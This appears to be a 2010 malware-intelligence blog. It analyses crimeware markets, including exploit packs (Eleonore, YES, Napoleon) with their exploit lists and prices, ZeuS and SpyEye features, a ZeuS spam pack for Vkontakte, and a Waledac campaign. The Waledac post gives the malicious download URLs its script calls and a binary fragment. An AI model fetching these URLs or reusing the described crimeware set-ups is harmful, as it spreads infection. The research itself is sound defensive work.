MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

28.1.10

The exploitation of vulnerability now represents one of the highest infection strategies used in the stage of crimeware and exploits while allowing exploit weaknesses aren't a new concept, the fact is that more and more notorious actions.

In fact now continue to be exploited, especially through exploits pack, a large number of vulnerabilities that many have been settled more than two years ago.

However, when these vulnerabilities are of type 0-Day, the problem is power. Cases such as "Operation Aurora" which has recently been bandied about by exploiting a vulnerability in the type 0-Day Internet Explorer 6. Yes, you read that right ... Internet Explorer 6 and currently is being used to spread malware mass but only through version 6, but also on the 7 and 8.

The vulnerability is identified as CVE-2010-0249, and as was the case with the vulnerability exploited by the worm conficker (MS08-067) where automated creation, has recently met a builder that automates the creation of the exploit for Internet Explorer in an extremely simple question that is common in such applications.

This application is Chinese and only lets you configure the web address from where you try to exploit the weakness in the browser. Then generates a file called IE.html containing the exploit code and the url used for the attack, which is obfuscated.

As condiments relevant subject, the exploit generated (embedded in the html) is detected by less than 40% of companies reporting according to antivirus virutotal. While the builder is detected, by far, at least 25%.

On the other hand, exploits automation generates a gap, revealing that many operations "disguised" as part of campaign of distraction after simple attacks, are closely related to intelligence affairs.

In light of all the recent financal trojans here are two examples of what ZeuS-bots have modules for. These modules are recording form info and keystrokes from user' logging into Bank of America and Paypal. Both of these screenshots are examples of the capabilities of the newer ZeuS-bots out there.

This and keylogging opens the bank vault for these organized groups operating around the world. Here is the gateway that enables them to wire-transfere your money to money-mule networks and back to them.

The features shown here along with keylogging that is transmitted back to the C&C's opens many doors for espionage. These trojans open the floodgates.

To see examples of what they and others have done see Brian Krebs blog which covers among other things Remote Access Trojans (RAT) and online bank theft.

27.1.10

SpyEye, a bot which first’s release was on January’s 2 of this year, is a "fresh" malware of interesting features, which has a considerable fast development, being on its 1.0.65 version at the moment.

It was written almost in its entirety on C++, and the binary file has a size of 60kb approximately.
It works from Windows 2000 to Windows 7, and it runs on ring3 (something that possibly makes it detectable for tools like GMER).

Something really interesting here, is that, at the date of first release, the detection rate was basically zero. The price of this bot (base bundle) is USD 500, and some of the features that this bot has at the moment are:

As the author says, the mentioned product is very stable, and has a permanence rate of 30%.
As we can see, this industry is in a constant growing-and-sophistication process, something that after all, is very alarming.

25.1.10

We were able to analyze a pack to make zombies of ZeuS at spammers through social networks. Specifically, the module is analyzed developed for use in Vkontakte.ru, the Russian clone of Facebook.

This crimeware has been created by someone calling himself Deex of Freedomscripts Team and sold for the modest price of USD 100 (via WebMoney).

The pack includes several configuration files, which make it:

config.ini: has defined the target (friends or online, although so far only seems to work the first option) and password of the administrator control panel. When selecting friends, messages are sent to all our contacts, but are not online at that time.

message.txt: contains the text of the message to send.

title.txt: contains the title of the message to send.

results.txt: here were keeping the infected user statistics (vkontakte identifier, IP and number of messages sent).

The contents of that file should be added (or completely replace) the file of the same name necessary to build binaries of ZeuS, and then reconstruct the configuration file and the executable of ZeuS.

Once the victim's PC is infected with this executable as well as sending a typical ZeuS reports, will check the page you visited and if the addition of Vkontakte.ru and be in English (does not work in other languages) , activate the injection of code in the page, which always maintains the appearance of authenticity.

From that moment, all requests are processed by the HTML page that handles getconfig.php later call to the real page to avoid suspicion, showing the user the actual content as you surf vkontakte.ru its pages; while below, sends a message every time you click a link from the page js.php, as seen in the following snippet from log:

The result can be seen in the sent items, where all messages that have been sending our contacts:

All this is managed from a panel of independent control of ZeuS, which requires no database to run, since configuration and reporting are in separate text files.

The control panel is simple enough. It has a blank login page with a box to put the password that gives access to the panel itself, with a menu of 5 options:

Reports: shows the result of sending spam. In our example, the ID has sent 20 messages from the specified IP.

Inject: shows the code injection (webinjects.txt) and links to three pages responsible for performing tasks involving the shipment.

Settings: From here you can manage the configuration files to change the password and set the title and body of the message to send. This data is stored in the configuration files mentioned above.

Help: A brief page with some indication of what this pack and the two component parts: Inject and Admin.

Logout. To exit the control panel.

In short, this package demonstrates how easy it's to take advantage of belonging to a botnet zombies under the control of ZeuS for the sending of messages through social networks.

Although this case concerns only in the first instance, to Vkontakte.ru, adapt it to other social networks or use it for other attacks through web pages, such as making fraudulent clicks, it would be pretty easy.

18.1.10

As many readers know, since we have been researching Malware Intelligence direct implications of all this new generation of malicious code and criminal activity that daily feed back the business of crimeware.

Under this premise, the researchers focused their efforts on trying to reveal the different branches that are entangled with each other in a tangle of illegal actions aimed mainly to get money from users through unethical techniques. And according to this ... there are still doubts that we are facing a big business that profit through illegal activities that rub? (obviously, always according to the laws of each country). I think the unanimous answer is NO.

Saved this assessment after exposing both content around the state of the art of crimeware, including relevant data yet unexposed to not hamper the continuity of investigations, and has become a common aspect receive messages and comments, most aggressive, those responsible for the development or commercialization of certain applications crimeware.

Under this scenario, and although I'm not giving explanations on the research we perform, this time an exception will expose two of the last comments we have received from those who are part of the business of crimeware.

The first case is an anonymous, non-aggressive that I personally must confess that ... very nice:) left by one of the Partners, which markets the crimeware YES Exploit System. The comment was made in the article that talks about this exploit pack, and which also find my answer. The comment is as follows:YES, We are the blackhats :)Thanks for small review, but why do ppl think that blackhats are poor guyz?It's just a business, no less, no more :) Do you wanna buy our excellent product? - there is discounts for you ;)

As they say my "friends" to them is "just a business, neither more nor less." However, let us agree that, besides not being a conventional business, represents a business model that directly and actively collaborates with criminal activities, which isn't so funny.

Now, YES Exploit System is a crimeware development that has much in your code and whose market value is USD 800. And the one thing is funny (as last sentence of the comet) is knowing that I will not get any discount on crimeware ;)

The second case I want to present is a bit more aggressive in terms of what was written in the report on the Russian service to test the detection of malware, it can read the comment and my response, which does not transcribe here because of its length. The message reads:

"In summary, further evidence that not only the exploitation of malware generates profits but also moves parallel money on services tothis industry. And in some cases like the present one, have to see if you can consider this service as a criminal act or not."
Wow and why would this service be criminal act?

It's clear to me that someone has a year work in a software like this scanner and he want to make money with it.If you don't like it don't use it. Noone forces you to pay for it or submit files there but since I see you are a little wankerblogger who does not respect others work I giving it to you straight.

You have no inside experience in the antivirus industry whatsoever otherwise you would know that VirusTotal distributes 200K files/dayto antivirus companies for FREE. AV companies are shit on online scanners, they wouldn't even contact you if you would ask them about filedistribution and they definately wouldn't support an online scanner so what else can these services do to remain online?

Before you criticizing others work put something down on the table little frustrated shit..."

Regardless of the aggressive connotation that presents this second point, it's interesting who comes. Someone who uses the word as a nickname "KLESK" and host of an "attempt by business" completely unlawful, in which page one of the first things we read is "Selling corporate data, trade secrets".

"We sell corporate data and trade secrets", continues the propaganda. Clarify further what type of information supposedly "steal" companies, and topped with something very interesting:

In order, particularly the latter case represents a good opportunity to analyze the psychology of a prospectus to cyber-criminal whose attempt to "negotiate" not only leaves much to be desired but can not even be rated as a possibility to be considered as an object research.

16.1.10

Undoubtedly, the business that is currently crimeware expands every day. Not only this aspect is reflected in the professionalization on the development and operation of various computer applications and technologies used to commit crimes and attacks via web, but also on sales strategies that are used to channel the attention of a greater volume of restless minds, who collect stealing money from others on a foundation of business, a botnet.

While even 90% of the sale of crimeware takes place in an environment where supply is underground proposal directly by the creator of crimeware, cyber-criminals are taking their business to a level underground "clearer" and "more high", publicizing their developments through websites designed exclusively to offer their "services" but through" business partners" to ensure the logistics of the case.

In early 2009 we mentioned the case of the sale via the web, Unique Sploit Pack, one of the general purpose exploit pack currently most in demand, whose commerce website was online a while until I was discharged just because it's a crimeware.

However, this strategy in marketing, sales increased again to the plane of the hand of YES Exploit Pack, one of the most active crimeware today.

Under the slogan "Improve your business with YES Exploit System. Exploit Pack from Russia" proposed sale of version 2 of this exploit pack through a website registered in Russia.

The propaganda campaign (marketing strategy) from the website is to explain briefly what are the salient features of crimeware, by way of justifying why it's better than other packages on your style (the competition). It costs USD 800 and the transaction is done, as is typically done via WebMoney.

9.1.10

This is the first release of an exploit pack to monitor a particular purpose botnets alled Napoleon Sploit, which launched the underground market crimewarein August 2009.

Due to his premature and low status of "complex Exploit Pack" when compared with others of its style, is low cost and in fact had no impact on the underground circuit sales, although it's still for sale at a cost USD 299 can obtain important updates for USD 35 plus.

As we see in the image, its interface is very simple and minimalist. Only has two modules (statistical and configuration) plus panel authentication (login via web), and according to its author, the style of light colors crimeware is designed to not cause fatigue in the light of cybercriminals, "future clients".

(No words, but I expect opinions on this). The following image belongs to the control panel.

The Exploit pack is designed to exploit specific vulnerabilities according to the following exploits:

MDAC - IE5, IE6

Opera Telnet - Opera 9.00 - 9.27

PDF Util.Printf - PDF Adobe Reader 8.1.2

PDF Collab.Geticon PDF Util.Printf - Adobe Reader & Acrobat > 8.1.2

One detail that I can not pass is that crimeware is the ancestor of Siberia Exploit Pack, other particular purpose web application developed by the same author Napoleon Sploit, who is In-The-Wild.

5.1.10

"Crimeware in 2009" presented in one document all that was channeled through this blog during the year in question on crimeware and associated hazards.

There are a total of 262 pages and is divided by the most relevant topics that describe the criminal activities that were a source of news on this blog. Has two indices for getting the news in a simple (content) and another on the images (image index).

4.1.10

Since launching the first version in June 2009, Eleonore Exploit Pack has a major impact in the criminal field, both from the demand to get the Exploit Pack because of its cost competitive compared to similar web applications, as its high rate of activity.

It currently has a repertoire of 6 (six) versions, the last being 1.3.2, recently appeared on the scene underground at a cost of USD 1000.

This means that its author, ExManoize, the package was updated approximately every month, giving a concrete idea of the effort placed in its development, and that obviously isn't by vocation but responds, part of the fraudulent business, collaborating with the creation and maintaining one of the "tools" used in the criminal field.

The structure of this crimeware is quite complex and has a repertoire of 13 (thirteen) exploits by default included in the package and include:

MDAC for MSIE

MS009-02 for MSIE

ActiveX pack. Funciona en MSIE

compareTo for Firefox

JNO (JS navigator Object Code) for Firefox

MS06-006 for Firefox

Font tags for Firefox

Telnet for Opera

PDF collab.getIcon for all browser

PDF Util.Printf for all browser

PDF collab.collectEmailInfo for all browser

PDF Doc.media.newPlayer for all browser

Java calendar for all browser

Obviously, like any service that is offered in a market model, and it's crimeware including this, the "provider" secure the support, updates and cleanup of the package if necessary. All business!

From a historical standpoint, Eleonore Exploit Pack updatesare:

In June 2009 is available to the public the sale of Eleonore Exploit Pack v1.0 containing MDAC exploits, MS009-02, Snapshot, Telnet (for opera), PDF collab.getIcon, Util.Printf PDF, PDF collab.collectEmailInfo. Its value was in principle not of USD 599.

In July 2009 is updated to version 1.1 and adds two more exploits: Font tags that explodes in Firefox 3.5 and DirectX DirectShow that explodes in IE 6 and 7. Furthermore, there are improvements in encryption scripts. Its value was USD 500, and the previous version under the price to USD 300.

During the month of July, add the exploit Spreadsheet, PDF files are changed, eliminating the capture of images and adds the ability to upload a file through the admin panel itself. The version is called 1.2 and its cost is set at USD 700.

After a period of three months without updates in October is version 1.3, incorporating more features in the package fraudulent. Among them, some "improvements" exploits for Internet Explorer and adds Java D&E. The cost of this version was USD 1000.

In November began the marketing of version 1.3.1, which exploits continue to refine and, inter alia, add a Robots.txt file to improve the indexing and prevent certain folders are displayed. The price remained at USD 1000.

On December 16, is the latest version, 1.3.2 that adds Java calendar and a recent vulnerability Exploit for PDF Doc.media.newPlayer, which until then was a 0-Day. Its value was unchanged.

From the standpoint of the employer, the infrastructure to handle the business of botnets is to assemble and put into operation through a dedicated server can also be hired. However, to obtain the economic benefit of the zombies is needed because without them there could be fraudulent better job for schools are designed. In fact, the package is updated fairly regularly, demonstrates that the benefits obtained through these activities are important.

Moreover, regardless of the cost has crimeware, there are "extra services" offered by the developer, which are not included in the original package, for example, cleaning of the botnet at a cost USD 50, as the malicious domain change for the same value, USD 50.

Alternatively, botmaster (not necessarily the web application developers) often rent their botnet partially, and in the case of Eleonore Exploit Pack v1.3.2, your rent is USD 40 per day.

3.1.10

The business models offered by cloud computing are not new. Even many services currently offered under this banner have a model already established long ago in the market.

However, the Cloud Computing concept in itself that we know today responds to a sharply inclined orientation to generate business leveraging the Internet as infrastructure, which in a highly competitive market enjoys certain advantages over conventional business.

Under this scenario, the fact is that this way of creating business was also accepted and implemented by those who profit daily through a battery of programs designed for fraudulent purposes that when used over the Internet, receive the word of Crimeware-as-a-Service, or also by its acronym CaaS.

They begin to take shape fraudulent services that seek to automate the handling of malware in the process created solely to evade detection. An example of this is the service (which no longer exists), called PoisonIvy Polymorphic Online Builder, designed to encrypt malware and we talk at the time. In this case, when handling malicious code only, this service will be crowded under the term Malware-as-a-Service (MaaS).

Similarly, there are currently developed services for profit and intended to feed the crimeware business through mechanisms to verify the degree of effectiveness against malware antivirus scan engines.

These services are the antonym of other highly used by security professionals such as VirusTotal Hispasec Spanish company. On one of them also have spoken, called VirTest.

However, there are some other as Private antivirus service (established in 2008), which like VirTest is of Russian origin, and seek financial gain through a paid service, but also collaborate with the environment of cyber-crime by offering the possibility to check the malware created to meet their detection rate at a given moment, ensuring also that the binary will not be shared with antivirus companies. Thus, anonymity is assured and a longer life cycle for the threat.

The fraudulent service verifies the effectiveness of malware against 17 antivirus engines known anti-malware market, and as displayed in the first catch, there are three costs depending on the characteristic of the "hired":

USD 0.2 by check

USD 15 by 10 Chequeos limited daily

USD 20 for checks unlimited

Once inside the system, since the flap AV check, the binaries are uploaded to be submitted to the antivirus scan, then the report and providing a history of uploads. These options are found in the lower left corner.

An interesting aspect that offers this service of crimeware, which is the ability to schedule tasks of verification, through the second tab called Scheduler.

This option allows, first, upload a malicious file from the hard drive of the creator of malware, and on the other, select a malware that is already present in the circuit of propagation through the URL, ie that the cyber -crooks can verify and monitor and detect malicious code that already this spreading.

In this way and through the "programmer", is scheduled checkup frequency uploaded malicious code based on a set of parameters that are chosen according to a set time ranging in the range of 3, 6, 12 hours, or 1 and 3 days.

These parameters are configurable and once established can be viewed in a table shown in the same window. The third column corresponds to the time range. It also configures how display a warning to the report, which may be through email or through ICQ.

Clearly, these options are designed considering criminal maneuvering speed of propagation of malware checking, in the shortest of times, every 3 hours to check if the threat is detected by antivirus companies. This allows the malware to change whenever necessary, and to combine the service with others such as the "service" referred to above for encrypting the files.

Obviously those who are part of the criminal chain of crimeware business, working together through different alternatives, forming also a business side that also feeds on the criminal activities.

2.1.10

The trojan waledac in charge of recruiting zombies for a botnet dedicated to feed spam, recently returned to give notice as an excuse to use the new year 2010.

However, their fraudulent activities dating from 2007 when he was known under the nomenclature of storm, and since then, this family of malware has taken advantage of social engineering as the main strategy of propagating different coverages.

This timeline extends from the first activities of social engineering to the last and most recently known relacionda at the beginning of 2010.

1.1.10

After a long period of inactivity, the botnet consisting waledac again deploy a strategy of infection using the pattern that characterizes it: Social Engineering, that this time advantage as cover the beginning of the new year.

Latest waledac campaigns dating from the middle of the year when propagation strategy used pretended to be a video on Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.

Here we see catches describe waledac timeline about their business during 2009.

However, those who are behind waledac never stopped and have recently used the domain registration date throughout the period of supposed inactivity.

Each page used for the propagation has a script obfuscated with instructions to be executed automatically on the victim machine. Thus, it exploits a weakness and automatically download and execute malware, turning your computer into a node of the botnet to continue with their activities. We then see a screenshot of the script.

Inside the script is the reference to the counter.php file hosting another script and from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and this http://diokxbgrqkgg.com/nte/trest1. py, where there is another malicious script.

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.$.........y.=u..=u..=u...u..u..

Waledac is back with a new excuse, but judging by the percentage of activity that owns the server where it's housed, it appears that he always remained dormant with very sporadic activities. Even taking into account the folder structure from which to download, seems to have a direct relationship with another threat that is Bredolab well known, and which apparently also associated with some scareware and ZeuS.